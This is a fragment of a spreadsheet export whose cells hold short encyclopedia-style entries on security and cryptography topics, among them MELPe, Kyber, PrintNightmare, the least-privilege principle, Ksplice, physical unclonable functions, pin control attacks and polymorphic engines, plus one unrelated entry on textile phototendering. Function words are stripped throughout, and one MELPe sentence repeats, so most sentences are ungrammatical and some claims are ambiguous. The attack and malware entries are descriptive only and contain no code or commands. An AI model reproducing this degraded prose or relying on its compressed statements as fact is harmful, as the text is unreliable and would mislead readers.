immunity), reducing throughput requirements. nato testing also included interoperability tests, used hours speech data, conducted test laboratories worldwide. compandent inc, part melpe-based projects performed nato, provided nato special test-bed platform known melcoder device provided golden reference real-time implementation melpe. low-cost flexi-232 data terminal equipment (dte) made compandent, based melcoder golden reference, popular widely used evaluating testing melpe real-time, various channels networks, field conditions. nato competition concluded melpe substantially improved performance terms speech quality, intelligibility, noise immunity), reducing throughput requirements. nato testing also included interoperability tests, used hours speech data, conducted test laboratories worldwide. 2005, bit/s rate melpe variation thales group (france) added (without extensive competition testing performed 2400/1200 bit/s melpe) nato standard stanag-4591, advanced efforts lower bitrates bit/s even bit/s.in 2010 lincoln labs., compandent, bbn, general dynamics also developed darpa bit/s melp device quality better bit/s melpe, delay longer. other aleksandr solzhenitsyn's novel first circle character volodin's recorded phone call traced since properly encrypted. decipherment makes spectral analysis. also scrambler melpe melp cryptography pseudorandom noise sigsaly scip secure telephone secure terminal equipment vinson voip encryption systems zrtp fishbowl (secure phone) references</t>
  </si>
  <si>
    <t>Language-based security</t>
  </si>
  <si>
    <t>computer science, language-based security (lbs) techniques used strengthen security applications high level using properties programming languages. considered enforce computer security application-level, making possible prevent vulnerabilities traditional operating system security unable handle. software applications typically specified implemented certain programming languages, order protect attacks, flaws bugs application's source code might vulnerable need application-level security; security evaluating applications behavior respect programming language. this area generally known language-based security. motivation large software systems, scada, taking place around world computer systems constitute core many infrastructures. society relies greatly infrastructure water, energy, communication transportation, rely fully functionally working computer systems. there several well known examples critical systems fail bugs errors software, shortage computer memory caused computers crash hundreds flights delayed (april 2014).traditionally, mechanisms used control correct behavior software implemented operating system level. operating system handles several possible security violations memory access violations, stack overflow violations, access control violations, many others. this crucial part security computer systems, however securing behavior software specific level, even stronger security achieved. since properties behavior software lost compilation, significantly difficult detect vulnerabilities machine code. evaluating source code, compilation, theory implementation programming language also considered, vulnerabilities uncovered. developers keep making mistakes? instead relying programmers' memories, strive produce tools codify known common security vulnerabilities integrate directly development process." evans larochelle, 2002 objective language-based security using lbs, security software increased several areas, depending techniques used. common programming errors allowing buffer overflows illegal information flows occur, detected disallowed software used consumer. also desirable provide proof consumer security properties software, making consumer able trust software without receive source code self checking errors. compiler, taking source code input, performs several language specific operations code order translate machine readable code. lexical analysis, preprocessing, parsing, semantic analysis, code generation, code optimization commonly used operations compilers. analyzing source code using theory implementation language, compiler attempt correctly translate high-level code low-level code, preserving behavior program. during compilation programs written type-safe language, java, source code must type-check successfully compilation. type-check fails, compilation performed, source code needs modified. this means that, given correct compiler, code compiled successfully type-checked source program clear invalid assignment errors. this information value code consumer, provides degree guarantee program crash specific error. goal ensure presence certain properties source code corresponding safety policy software. information gathered compilation used create certificate provided consumer proof safety given program. such proof must imply consumer trust compiler used supplier certificate, information source code, verified. figure illustrates certification verification low-level code could established certifying compiler. software supplier gains advantage reveal source code, consumer left task verifying certificate, easy task compared evaluation compilation source code itself. verifying certificate requires limited trusted code base containing compiler verifier. techniques program analysis main applications program analysis program optimization (running time, space requirements, power consumption etc.) program correctness (bugs, security vulnerabilities etc.). program analysis applied compilation (static analysis), run-time (dynamic analysis), both. language-based security, program analysis provide several useful features, type checking (static dynamic), monitoring, taint checking control-flow analysis. information flow analysis information flow analysis described tools used analyze information flow control program, order preserve confidentiality integrity regular access control mechanisms come short. decoupling right access information right disseminate flow model goes beyond access matrix model ability specify secure information flow. practical system needs access flow control satisfy security requirements." denning, 1976 access control enforces checks access information, concerned happens that. example: system users, alice bob. alice file secret.txt, allowed read edited her, prefers keep information herself. system, also exists file public.txt, free read edit users system. suppose alice accidentally downloaded malicious program. this program access system alice, bypassing access control check secret.txt. malicious program copies content secret.txt places public.txt, allowing users read this constitutes violation intended confidentiality policy system. noninterference noninterference property programs leak reveal information variables higher security classification, depending input variables lower security classification. program satisfies noninterference produce output whenever corresponding input lower variables used. this must hold every possible value input. this implies even higher variables program different values execution another, visible lower variables. attacker could execute program satisfy noninterference repeatedly systematically behavior. several iterations could lead disclosure higher variables, attacker learn sensitive information example systems state. whether program satisfies noninterference evaluated compilation assuming presence security type systems. security type system security type system kind type system used software developers order check security properties code. language security types, types variables expressions relate security policy application, programmers able specify application security policy type declarations. types used reason various kinds security policies, including authorization policies access control capabilities) information flow security. security type systems formally related underlying security policy, security type system sound programs type-check satisfy policy semantic sense. example, security type system information flow might enforce noninterference, meaning type checking reveals whether violation confidentiality integrity program. securing low-level code vulnerabilities low-level code bugs flaws lead program state behavior program undefined source programming language. behavior low-level program depend compiler, runtime system operating system details. this allows attacker drive program towards undefined state, exploit behavior system. common exploits insecure low-level code lets attacker perform unauthorized reads writes memory addresses. memory addresses either random chosen attacker. using safe languages approach achieve secure low-level code safe high-level languages. safe language considered completely defined programmers' manual. could lead implementation-dependent behavior safe language either detected compile time lead well-defined error behavior run-runtime. java, accessing array bounds, exception thrown. examples safe languages haskell scala. defensive execution unsafe languages during compilation unsafe language run-time checks added low-level code detect source-level undefined behavior. example canaries, terminate program discovering bounds violations. downside using run-time checks bounds checking impose considerable performance overhead. memory protection, using non-executable stack and/or heap, also seen additional run-time checks. this used many modern operating systems. isolated execution modules general idea identify sensitive code application data analyzing source code. once done different data separated placed different modules. when assuming module total control sensitive information contains, possible specify leave module. example cryptographic module prevent keys ever leaving module unencrypted. certifying compilation certifying compilation idea producing certificate compilation source code, using information high-level programming language semantics. this certificate enclosed compiled code order provide form proof consumer source code compiled according certain rules. certificate produced different ways, e.g. proof-carrying code (pcc) typed assembly language (tal). proof-carrying code main aspects summarized following steps: supplier provides executable program various annotations produced certifying compiler. consumer provides verification condition, based security policy. this sent supplier. supplier runs verification condition theorem prover produce proof consumer program fact satisfies security policy. consumer runs proof proof checker verify proof validity.an example certifying compiler touchstone compiler, provides formal proof type- memory safety programs implemented java. typed assembly language applicable programming languages make type system. after compilation, object code carry type annotation checked ordinary type checker. annotation produced many ways similar annotations provided pcc, limitations. however, handle security policy expressed restrictions type system, include memory safety control flow, among others. seminars dagstuhl seminar 03411, language-based security, october 2003. references books barthe, grégoire, rezk, compilation certificates, 2008 brian chess gary mcgraw, static analysis security, 2004. further reading dexter kozen, language based security, cornell university, 1999 pieter agten al., recent developments low-level software security, universiteit leuven andrei sabelfeld andrew myers, language-based information-flow security fred schneider al., language-based approach security, carnegie mellon university, 2000</t>
  </si>
  <si>
    <t>Key generation</t>
  </si>
  <si>
    <t>generation process generating keys cryptography. used encrypt decrypt whatever data encrypted/decrypted. device program used generate keys called generator keygen. generation cryptography modern cryptographic systems include symmetric-key algorithms (such aes) public-key algorithms (such rsa). symmetric-key algorithms single shared key; keeping data secret requires keeping secret. public-key algorithms public private key. public made available anyone (often means digital certificate). sender encrypts data receiver's public key; holder private decrypt data. since public-key algorithms tend much slower symmetric-key algorithms, modern systems combination two: party receives other's public key, encrypts small piece data (either symmetric data used generate it). remainder conversation uses (typically faster) symmetric-key algorithm encryption. computer cryptography uses integers keys. cases keys randomly generated using random number generator (rng) pseudorandom number generator (prng). prng computer algorithm produces data appears random analysis. prngs system entropy seed data generally produce better results, since makes initial conditions prng much difficult attacker guess. another generate randomness utilize information outside system. veracrypt disk encryption software) utilizes user mouse movements generate unique seeds, users encouraged move mouse sporadically. situations, derived deterministically using passphrase derivation function. many modern protocols designed forward secrecy, requires generating fresh shared session. classic cryptosystems invariably generate identical keys communication link somehow transport keys link. however, simplifies management diffie–hellman exchange instead. simplest method read encrypted data without actually decrypting brute-force attack—simply attempting every number, maximum length key. therefore, important sufficiently long length; longer keys take exponentially longer attack, rendering brute-force attack impractical. currently, lengths bits (for symmetric algorithms) 2048 bits (for public-key algorithms) common. generation physical layer wireless channels wireless channel characterized users. transmitting pilot signals, users estimate channel channel information generate secret them. common secret group users generated based channel pair users. optical fiber also generated exploiting phase fluctuation fiber link. also distributed generation: protocols, party sole possession secret key. rather, distributed generation, every party obtains share key. threshold participating parties need cooperate achieve cryptographic task, decrypting message. references</t>
  </si>
  <si>
    <t>Kyber</t>
  </si>
  <si>
    <t>kyber encapsulation method (kem) designed resistant cryptanalytic attacks future powerful quantum computers. used establish shared secret communicating parties without (ind-cca2) attacker transmission system able decrypt this asymmetric cryptosystem uses variant presumably np-hard lattice problem learning errors basic trapdoor function. nist competition first post-quantum cryptography (pq) standard. kyber named fictional kyber crystals used power lightsabers star wars universe (compare [light-]saber). properties system based module learning errors (m-lwe) field machine learning, conjunction cyclotomic rings. since recently, also tight formal mathematical security reduction ring-lwe problem mlwe. compared competing methods, typical advantages lattice-based methods, e.g. regard runtime well size ciphertexts material. variants different security levels defined: kyber512 (nist security level ≈aes 128), kyber768 (nist security level ≈aes 192), kyber1024 (nist security level ≈aes 256). complexity bits, secret keys 2400, public keys 1088, ciphertexts 1184 bytes size. with accordingly optimized implementation, kilobytes memory sufficient cryptographic operations. chat encryption scenario using liboqs, replacing extremely efficient, non-quantum-safe ecdh exchange using curve25519 found increase runtime factor (1.5–7), estimated 2.3-fold (1.4–3.1) increase energy consumption, times (48–92) data overhead. internal hashing operations account majority runtime, would thus potentially benefit greatly corresponding hardware acceleration. development kyber derived method published 2005 oded regev, developed developers europe north america, employed various government universities research institutions, private companies, funding european commission, switzerland, netherlands, germany. they also developed related complementary signature scheme dilithium, another component "cryptographic suite algebraic lattices" (crystals). like pqc-kem methods, kyber makes extensive hashing internally. kyber's case, variants keccak (sha-3/shake) used here, generate pseudorandom numbers, among things. 2017 method submitted national institute standards technology (nist) public selection process first standard quantum-safe cryptographic primitives (nistpqc). promising finalists standard expected early 2022. four asymmetric encryption algorithms, competes least methods. mceliece method based different principle could standardized additionally. second phase selection process, several parameters algorithm adjusted compression public keys dropped. while computational complexity algorithm outstandingly comparison, nist could choose ntru conservative option, security issues patent claims arise kyber. french national centre scientific research's claimed applicability gaborit aguilar-melchor patent disputed. most recently, nist paid particular attention costs terms runtime complexity implementations mask runtimes order prevent corresponding side-channel attacks (sca). usage developers released reference implementation public domain cc0), written program library liboqs open quantum safe (oqs) project contains implementation based that. also maintains quantum-safe development branch openssl, integrated boringssl, code also integrated wolfssl. there handful implementations using various programming languages third-party developers, including javascript java. various (free) optimized hardware implementations exist, including resistant side-channel attacks. german federal office information security aiming implementation thunderbird, context also implementation botan program library corresponding adjustments openpgp standard. references external links official website kyber github original method oded regev (2005), lattices, learning errors, random linear codes, cryptography", proceedings thirty-seventh annual symposium theory computing (stoc '05) german), baltimore, usa: press, doi:10.1145/1060590.1060603, isbn 978-1-58113-960-0, s2cid 53223958</t>
  </si>
  <si>
    <t>PrintNightmare</t>
  </si>
  <si>
    <t>printnightmare critical security vulnerability affecting microsoft windows operating system. vulnerabilility occurs within print spooler service. there variants, permitting remote code execution (cve-2021-34527), leading privilege escalation (cve-2021-1675). third vulnerability (cve-2021-34481) announced july 15th, 2021, upgraded remote code execution microsoft august.on july 2021, microsoft started releasing out-of-band (unscheduled) patches attempting address vulnerability. severity, microsoft released patches windows windows server 2012, despite mainstream support period. patches resulted printers ceasing function. researchers noted vulnerability fully addressed patches. after patch applied, administrators able install printer drivers windows print server, part vulnerability related ability non-administrators install printer drivers system.the organization discovered vulnerability, sangfor, published proof concept public github repository. apparently published error, result miscommunication reseachers microsoft, proof concept deleted shortly after. however, several copies since appeared online. also bluekeep wannacry references</t>
  </si>
  <si>
    <t>Lane (hash function)</t>
  </si>
  <si>
    <t>lane cryptographic hash function submitted nist hash function competition; designed sebastiaan indesteege contributions elena andreeva, christophe cannière, dunkelman, emilia käsper, svetla nikova, bart preneel elmar tischhauser. re-uses many components custom construction. authors claim performance 25.66 cycles byte intel core duo. external links lane site</t>
  </si>
  <si>
    <t>Principle of least privilege</t>
  </si>
  <si>
    <t>information security, computer science, fields, principle least privilege (polp), also known principle minimal privilege principle least authority, requires particular abstraction layer computing environment, every module (such process, user, program, depending subject) must able access information resources necessary legitimate purpose. details principle means giving user account process privileges essential perform intended function. example, user account sole purpose creating backups need install software: hence, rights backup backup-related applications. privileges, installing software, blocked. principle applies also personal computer user usually work normal user account, opens privileged, password protected account situation absolutely demands when applied users, terms least user access least-privileged{{}} user account (lua) also used, referring concept user accounts privileges possible, also launch applications privileges possible. principle least privilege widely recognized important design consideration enhancing protection data functionality faults (fault tolerance) malicious behavior (computer security). benefits principle include: better system stability. when code limited scope changes make system, easier test possible actions interactions applications. practice example, applications running restricted rights access perform operations could crash machine, adversely affect applications running system. better system security. when code limited system-wide actions perform, vulnerabilities application cannot used exploit rest machine. example, microsoft states “running standard user mode gives customers increased protection inadvertent system-level damage caused "shatter attacks" malware, root kits, spyware, undetectable viruses”. ease deployment. general, fewer privileges application requires, easier deploy within larger environment. this usually results first benefits, applications install device drivers require elevated security privileges typically additional steps involved deployment. example, windows solution device drivers directly installation, device drivers must installed separately using windows installer service order grant driver elevated privileges.in practice, exist multiple competing definitions true least privilege. program complexity increases rapidly, number potential issues, rendering predictive approach impractical. examples include values variables process, addresses need, precise time things required. object capability systems allow, instance, deferring granting single-use privilege time used. currently, closest practical approach eliminate privileges manually evaluated unnecessary. resulting privileges typically exceeds true minimum required privileges process. another limitation granularity control operating environment privileges individual process. practice, rarely possible control process's access memory, processing time, device addresses modes precision needed facilitate precise privileges process require. original formulation jerome saltzer: every program every privileged user system operate using least amount privilege necessary complete job. peter denning, paper "fault tolerant operating systems", broader perspective among four fundamental principles fault tolerance. dynamic assignments privileges earlier discussed roger needham 1972.historically, oldest instance least privilege probably source code login.c, begins execution super-user permissions and—the instant longer necessary—dismisses setuid() non-zero argument demonstrated version unix source code. implementation kernel always runs maximum privileges since operating system core hardware access. principal responsibilities operating system, particularly multi-user operating system, management hardware's availability requests access running processes. when kernel crashes, mechanisms maintains state also fail. therefore, even recover without hard reset, security continues enforced, operating system cannot properly respond failure possible detect failure. this kernel execution either halted program counter resumed execution somewhere endless, and—usually—non-functional loop. this would akin either experiencing amnesia (kernel execution failure) trapped closed maze always returns starting point (closed loops). execution picks crash loading running trojan code, author trojan code usurp control processes. principle least privilege forces code lowest privilege/permission level possible. this means code resumes code execution-whether trojan simply code execution picking unexpected location—would ability perform malicious undesirable processes. method used accomplish implemented microprocessor hardware. example, intel architecture manufacturer designed four (ring ring running "modes" graduated degrees access-much like security clearance systems defence intelligence agencies.as implemented operating systems, processes execute potential privilege active privilege set. such privilege sets inherited parent determined semantics fork(). executable file performs privileged function—thereby technically constituting component tcb, concomitantly termed trusted program trusted process—may also marked privileges. this logical extension notions user group inheritance file privileges process determined semantics exec() family system calls. precise manner potential process privileges, actual process privileges, file privileges interact become complex. practice, least privilege practiced forcing process privileges required task. adherence model quite complex well error-prone. similar principles trusted computer system evaluation criteria (tcsec) concept trusted computing base (tcb) minimization stringent requirement applicable functionally strongest assurance classes, viz., (which evidentiarily different functionally identical). least privilege often associated privilege bracketing: assuming necessary privileges last possible moment dismissing soon longer strictly necessary, therefore ostensibly reducing fallout erroneous code unintentionally exploits privilege merited. least privilege also interpreted context distribution discretionary access control (dac) permissions, example asserting giving user read/write access file violates least privilege complete authorized tasks read permission. also user account control capability-based security compartmentalization (intelligence) confused deputy problem encapsulation (object-oriented programming) need know privilege bracketing privilege escalation privilege revocation (computing) privilege separation protection ring setuid sudo references bibliography external links managing least privileges cloud monique sendze saltzer schroeder paper cited references. (the implemented selinux) talks principle least privilege discussion implementation principle least privilege solaris tom's pro: most organizations unaware employees with admin rights "proof makes safer" dana applying principle least privilege user accounts windows microsoft "commercial enterprises putting critical infrastructure risk" successfully implement principle least privilege</t>
  </si>
  <si>
    <t>Ksplice</t>
  </si>
  <si>
    <t>ksplice open-source extension linux kernel allows security patches applied running kernel without need reboots, avoiding downtimes improving availability technique broadly referred dynamic software updating). ksplice supports patches make significant semantic changes kernel's data structures.ksplice implemented linux ia-32 x86-64 architectures. developed ksplice, inc. july 2011, oracle acquired ksplice offered support oracle linux. support enterprise linux dropped turned free 30-day trial rhel customers incentive migrate oracle linux premier support. time, oracle unbreakable enterprise kernel (uek) became requirement using ksplice production systems.as july 2015, ksplice available free desktop linux installations, official support available fedora ubuntu linux distributions. design ksplice takes input unified diff original kernel source code, updates running kernel memory. using ksplice require preparation system originally booted, (the running kernel needs special prior compiling, example). order generate update, ksplice must determine code within kernel changed source code patch. ksplice performs analysis executable linkable format (elf) object code layer, rather source code layer.to apply patch, ksplice first freezes execution computer program running. system verifies processors middle executing functions modified patch. ksplice modifies beginning changed functions instead point new, updated versions functions, modifies data structures memory need changed. finally, ksplice resumes processor running left off.to fully automatic, ksplice's design originally limited patches introduce semantic changes data structures, since linux kernel security patches make kinds changes. evaluation linux kernel security patches 2005 2008 found ksplice able apply fixes significant kernel vulnerabilities discovered interval. 2009, major linux vendors asked customers install kernel update month. patches introduce semantic changes data structures, ksplice requires programmer write short amount additional code help apply patch. this necessary updates time period. history ksplice software created four students based jeff arnold's master's thesis, later created ksplice, inc. around 2009, company $100k entrepreneurship competition cyber security challenge global security challenge. whereas ksplice software provided open source license, ksplice, inc. provided service make easier software. ksplice, inc. provided prebuilt tested updates hat, centos, debian, ubuntu fedora linux distributions. virtualization technologies openvz virtuozzo also supported. updates ubuntu desktop fedora systems provided free charge, whereas platforms offered subscription basis.on july 2011, oracle corporation announced acquired ksplice, inc. time company acquired, ksplice, inc. claimed companies using service protect 100,000 servers. while service available multiple linux distributions, stated time acquisition "oracle believes enterprise linux provider offer zero downtime updates." more explicitly, "oracle plan support ksplice technology enterprise linux." existing legacy customers continue supported ksplice, customers accepted platforms.as july 2015, ksplice available free fedora ubuntu. january 2016, ksplice integrated oracle's unbreakable enterprise kernel release oracle linux oracle's redistribution enterprise linux. also kexec, method loading whole kernel running system kgraft, kpatch kernelcare, linux kernel live patching technologies developed suse, cloudlinux, respectively loadable kernel module references external links official website</t>
  </si>
  <si>
    <t>Phototendering</t>
  </si>
  <si>
    <t>phototendering process organic fibres textiles lose strength flexibility result exposure sunlight. ultraviolet component sun's spectrum affects fibres, causing chain degradation hence loss strength. fading colours common problem phototendering. degradation rate deterioration also affected pigments dyes present textiles. pigments also affected, generally fading exposure radiation. great care needed preserve museum artefacts harmful effects ancient textiles, light, also present fluorescent lamps. paintings watercolours need protection sunlight original colours preserved. many synthetic polymers also degraded light polypropylene especially susceptible. result, stabilisers added many thermoplastics. carbon black also effective protecting products degradation. also polymer degradation textiles ultraviolet degradation stabilizers plastics external links survival textiles patent protection fibres phototendering</t>
  </si>
  <si>
    <t>Kobalos (malware)</t>
  </si>
  <si>
    <t>kobalos type backdoor malware runs linux, freebsd, solaris. malware targeting supercomputers, especially used academia scientific institutions, stealing credentials.artifacts code show aix, windows windows 3.11. references</t>
  </si>
  <si>
    <t>Portable application creators</t>
  </si>
  <si>
    <t>portable application creators allow creation portable applications (also called portable apps). they usually application virtualization. creators independent portable agent client required (also called "agentless" solutions): boxedapp packer developer tool cameyo application virtualization (free personal use) ceedo enigma virtual application virtualization system windows jauntepe free portable creator evalaze application virtualization installfree bridge (doesn't appear available since acquisition watchdox 2012) landesk application virtualization portableapps.com turbo studio (formerly: spoon studio xenocode virtual application studio) vmware thinapp (formerly: thinstall) related software live application mobility citrix xenapp java start appimage (linux) microsoft app-v mojopac sandboxie symantec endpoint virtualization suite systancia applidis windows zero install (linux) also application directory application streaming application virtualization comparison application virtual machines desktop virtualization emulator shim (computing) software service startkey virtual application workspace virtualization references</t>
  </si>
  <si>
    <t>Physical unclonable function</t>
  </si>
  <si>
    <t>physical unclonable function (sometimes also called physically unclonable function, refers weaker security metric physical unclonable function), puf, physical object given input conditions (challenge), provides physically defined "digital fingerprint" output (response) serves unique identifier, often semiconductor device microprocessor. pufs often based unique physical variations occurring naturally semiconductor manufacturing. physical entity embodied physical structure. today, pufs usually implemented integrated circuits typically used applications high-security requirements, specifically cryptography. history early references systems exploit physical properties disordered systems authentication purposes date back bauder 1983 simmons 1984. naccache frémanteau provided authentication scheme 1992 memory cards. terms powf (physical one-way function) (physical unclonable function) coined 2001 2002, latter publication describes first integrated where, unlike pufs based optics, measurement circuitry integrated onto electrical circuit (and fabricated silicon). starting 2010, gained attention smartcard market promising provide "silicon fingerprints", creating cryptographic keys unique individual smartcards.pufs established secure alternative battery-backed storage secret keys commercial fpgas, xilinx zynq ultrascale+, altera stratix concept pufs depend uniqueness physical microstructure. this microstructure depends random physical factors introduced manufacturing. these factors unpredictable uncontrollable, makes virtually impossible duplicate clone structure. rather embodying single cryptographic key, pufs implement challenge–response authentication evaluate microstructure. when physical stimulus applied structure, reacts unpredictable (but repeatable) complex interaction stimulus physical microstructure device. this exact microstructure depends physical factors introduced manufacture, unpredictable (like fair coin). applied stimulus called challenge, reaction called response. specific challenge corresponding response together form challenge-response pair crp. device's identity established properties microstructure itself. structure directly revealed challenge-response mechanism, device resistant spoofing attacks. using fuzzy extractor fuzzy commitment scheme provably suboptimal terms storage privacy leakage amount using nested polar codes made asymptotically optimal, extract unique strong cryptographic physical microstructure. unique reconstructed every time evaluated. challenge-response mechanism implemented using cryptography.pufs implemented small hardware investment compared cryptographic primitives provide unpredictable input/output behavior, pseudo-random functions. cases, pufs even built existing hardware right properties.unclonability means device unique unpredictable mapping challenges responses, even manufactured process similar device, infeasible construct challenge-response behavior another given exact control manufacturing process infeasible. mathematical unclonability means hard compute unknown response given crps properties random components puf. this response created complex interaction challenge many random components. words, given design system, without knowing physical properties random components, crps highly unpredictable. combination physical mathematical unclonability renders truly unclonable.note "unclonable" using physical implementation, extracted, there's generally problem cloning output using means. because properties, pufs used unique untamperable device identifier. pufs also used secure generation storage source randomness. types over types suggested. these range pufs evaluate intrinsic element pre-existing integrated electronic system concepts involve explicitly introducing random particle distributions surface physical objects authentication. pufs subject environmental variations temperature, supply voltage electromagnetic interference, affect performance. therefore, rather random, real power ability different devices simultaneously different environmental conditions device. error correction many applications, important output stable. used cryptographic algorithms, necessary error correction done correct errors caused underlying physical processes reconstruct exactly time operating conditions. principle basic concepts: pre-processing post-processing error correction code (ecc).on-chip units increase size, power, data processing time overheads; also expose vulnerabilities power analysis attacks attempt model mathematically. alternatively, designs like ec-puf require on-chip unit.strategies developed lead sram become reliable time without degrading quality measures security efficiency.research carnegie mellon university various implementations found error reduction techniques reduced errors response range percent ~100 percent.research university massachusetts amherst improve reliability sram puf-generated keys posited error correction technique reduce error rate.joint reliability–secrecy coding methods based transform coding used obtain significantly higher reliabilities generated low-complexity error-correcting codes codes suffice satisfy block error probability constraint errors billion bits.nested polar codes used vector quantization error correction jointly. their performance asymptotically optimal terms given blocklength, maximum number secret bits generated, minimum amount private information leaked outputs, minimum storage required. fuzzy commitment scheme fuzzy extractors shown suboptimal terms minimum storage. availability technology licensed several companies including ememory, subsidiary, pufsecurity, enthentica, ictk, intrinsic invia, quantumtrace, granite mountain technologies verayo. technology implemented several hardware platforms including microsemi smartfusion2, smartmx2, coherent logix hyperx, insidesecure microxsafe, altera stratix redpine signals wyzbee xilinx zynq ultrascale+. vulnerabilities 2011, university research showed delay-based implementations vulnerable side-channel attacks recommends countermeasures employed design prevent type attack. also, improper implementation could introduce "backdoors" otherwise secure system. june 2012, dominik merli, scientist fraunhofer research institution applied integrated security (aisec) claimed introduces entry points hacking cryptographic system investigation vulnerabilities pufs required pufs used practical security-related applications. presented attacks pufs implemented insecure systems, fpga static (sram). also important ensure environment suitable needed security level, otherwise attacks taking advantage temperature variations possible.in 2015, studies claimed possible attack certain kinds pufs low-cost equipment matter milliseconds. team ruhr universität bochum, germany, demonstrated method create model arbiter pufs thus able predict response kind challenge. their method requires crps, even resource-constrained devices take 200ms produce. using method device nfc-enabled smartphone, team able successfully clone puf-based rfid cards stored wallet users back pocket. provable machine learning attacks attacks mentioned range invasive, e.g., non-invasive attacks. celebrated types non-invasive attacks machine learning (ml) attacks. from beginning pufs, doubted primitives subject type attacks. lack thorough analysis mathematical proofs security pufs, attacks pufs introduced literature. consequently, countermeasures presented cope attacks less effective. line efforts, conjectured pufs considered circuits, provably hard break. response, mathematical framework suggested, provable algorithms several known families pufs introduced.along provable framework, assess security pufs attacks, property testing algorithms reintroduced hardware security community made publicly accessible. these algorithms trace roots back well-established fields research, namely property testing, machine learning theory, boolean analysis. attacks also apply pufs post-processing methods applied ignore effect correlations puf-circuit outputs. instance, obtaining comparing ring oscillator outputs method decrease correlation. however, method remove correlations. therefore, classic transforms signal-processing literature applied puf-circuit outputs decorrelate quantizing outputs transform domain generate sequences. such decorrelation methods help overcome correlation-based information leakages outputs even ambient temperature supply voltage change. optical pufs optical pufs rely random optical multiple-scattering medium, serves token. optical pufs offer promising approach developing entity authentication schemes robust many aforementioned attacks. however, security emulation attacks ensured case quantum readout (see below), database challenge-response pairs somehow encrypted. also hardware trojan quantum readout pufs random number generation defense strategy (computing) references external links "physical unclonable functions applications", srini devadas others, ultra-low-cost true randomness physical fingerprinting "mixed-signal physically unclonable function cmos capacitive cells", kamal kamal radu muresan</t>
  </si>
  <si>
    <t>Pin control attack</t>
  </si>
  <si>
    <t>control attack class attack system chip (soc) embedded system attacker targets configuration embedded systems disables software operating system functions without detection. attack facilitated lack hardware protection configuration multiplexing configurations. significant target control attack programmable logic controller (plc). application control attack plcs significant main mechanism plcs interact control outside world. like embedded devices controlled based approach. control attack attack attacker tamper integrity availability exploiting certain control operations lack hardware interrupts associated them. family attack first unveiled black europe 2016. control attack uses peripheral configuration settings physically terminate module communication interface plc. targeting configuration instead runtime changing logic program attackers avoid typical detection mechanisms exist embedded systems. background classic attacks plcs rely modifying device's firmware, configuration parameters, execution flow running processes. these typical attacks trigger interrupts plc's normal mode operation, security software picks alerts human operator. control attack targets plc's dynamic memory, device stores configuration. attack vectors researchers suggested least variant attack named configuration attack multiplexing attack. while attack vectors differently, concept similar physically terminate software access without software noticing lack hardware interrupts multiplexing configuration. multiplexing attack embedded socs usually employ hundreds pins connected electrical circuit. some pins single defined purpose. example, provide electricity clock signal. since different equipment vendors diverse requirements socs, manufacturer produces socs certain physical multiple mutually exclusive functionalities, depending application. concept redefining functionality called multiplexing necessary specifications design. regarding interaction multiplexing recommended vendors multiplex pins startup since interrupt multiplexing. however, user still multiplex runtime limitation that. current design multiplexing hardware level raises security questions. example, assume application uses particular peripheral controller connected particular multiplexing setup. point another application (second application) changes multiplexing setup used first application. once multiplexed, physical connection first peripheral controller gets disconnected. however, since interrupt hardware level, assume first peripheral controller still available. thus, continue carry write read operations requested application without error.the concept changing functionality connected runtime called multiplexing attack. configuration attack receive transmit various types electrical electronic signals. input, typically comes sensors, output, used control motors, valves relays, linked input output pins integrated circuit known system chip (soc). soc’s controller configure modes (i.e. serve input output). experts discovered attacker compromised tamper input output without detected without alerting operators monitoring process human-machine interface (hmi). stealthiness both configuration multiplexing don’t trigger alert hardware interrupt. therefore, active attack, runtime interact virtual memory attacker physically terminated connection virtual memory. state values software memory reflect physical memory known memory illusion. also attack cold boot attack logiclocker firewire security issue references</t>
  </si>
  <si>
    <t>Polymorphic engine</t>
  </si>
  <si>
    <t>polymorphic engine (sometimes called mutation engine mutating engine) software component uses polymorphic code alter payload preserving functionality. polymorphic engines used almost exclusively malware, purpose harder antivirus software detect. they either encrypting obfuscating malware payload. common deployment file binder weaves malware normal files, office documents. since type malware usually polymorphic, also known polymorphic packer. engine virut botnet example polymorphic engine. references</t>
  </si>
  <si>
    <t>Key distribution</t>
  </si>
  <si>
    <t>symmetric cryptography, parties must possess secret must exchange prior using encryption. distribution secret keys problematic recently, involved face-to-face meeting, trusted courier, sending existing encryption channel. first often impractical always unsafe, third depends security previous exchange. public cryptography, distribution public keys done public servers. when person creates key-pair, keep private other, known public-key, uploaded server accessed anyone send user private, encrypted, message. secure sockets layer (ssl) uses diffie–hellman exchange client public-private pair published certificate public infrastructure, public cryptography user keys credential. distribution important issue wireless sensor network (wsn) design. there many distribution schemes literature designed maintain easy time secure communication among sensor nodes. accepted method distribution wsns predistribution, secret keys placed sensor nodes deployment. when nodes deployed target area, secret keys used create network. info see: distribution wireless sensor networks. storage keys cloud distribution storage problematic cloud transitory nature agents secret sharing used store keys many different servers cloud. secret sharing, secret used seed generate number distinct secrets, pieces distributed subset recipients jointly authenticate secret information without learning rather store files different servers, parceled secret shares stored multiple locations manner subset shares regenerate key. secret sharing used cases wishes distribute secret among shares regenerate original secret, smaller group notes</t>
  </si>
  <si>
    <t>Protected Media Path</t>
  </si>
  <si>
    <t>protected media path technologies creating "protected environment," first included microsoft's windows vista operating system, used enforce digital rights management drm) protections content. subsets protected video path (pvp) protected user mode audio (puma). application uses protected media path windows uses media foundation. overview protected environment content played contains media components play content, application needs provide remote control (play, rewind, pause, on), rather handle unprotected content data. protected environment also provides necessary support microsoft-approved (signed) third-party software modules added. provides "wall" outside copying, within walls, content processed without making content available unapproved software. order prevent users copying content, windows vista provides process isolation continually monitors kernel-mode software loaded. unverified component detected, vista stop playing content, rather risk content copied. protected environment implemented completely software, software-based attacks patching windows kernel possible.these restrictions concern various outputs content, digital outputs digital visual interface (dvi) high definition multimedia interface (hdmi) high-bandwidth digital content protection (hdcp) enabled, prevent someone recording digital stream. even analog tv-style outputs typically require restrictions, provided mechanisms macrovision cgms-a. these restrictions apply drm-restricted content, blu-ray encrypted aacs, also apply windows using supported playback applications. users' standard unprotected content restrictions. some output types s/pdif (sony/philips digital interchange format) typically suitable scheme available, need turned reliably content specifies. vista, control video outputs provided pvp-opm, essentially next generation certified output protection protocol (copp) introduced windows however, rather software application programming interface, pvp-opm operates windows media components protected environment. additionally, pvp-uab (protected video path user-accessible bus) used encrypt video audio data passes pci-express bus, prevent intercepted copied graphics card. complementary output protection management. possible bypass january 2007 developer alex ionescu announced found method allows users bypass vista's protected media path. this would allow digital content played equipment implement restriction measures (like rescaling video resolutions disabling analog audio outputs). however, release source code fear microsoft lawsuit regarding possible violation dmca. march 2007, microsoft responded internal testing described method would work. criticism addition common 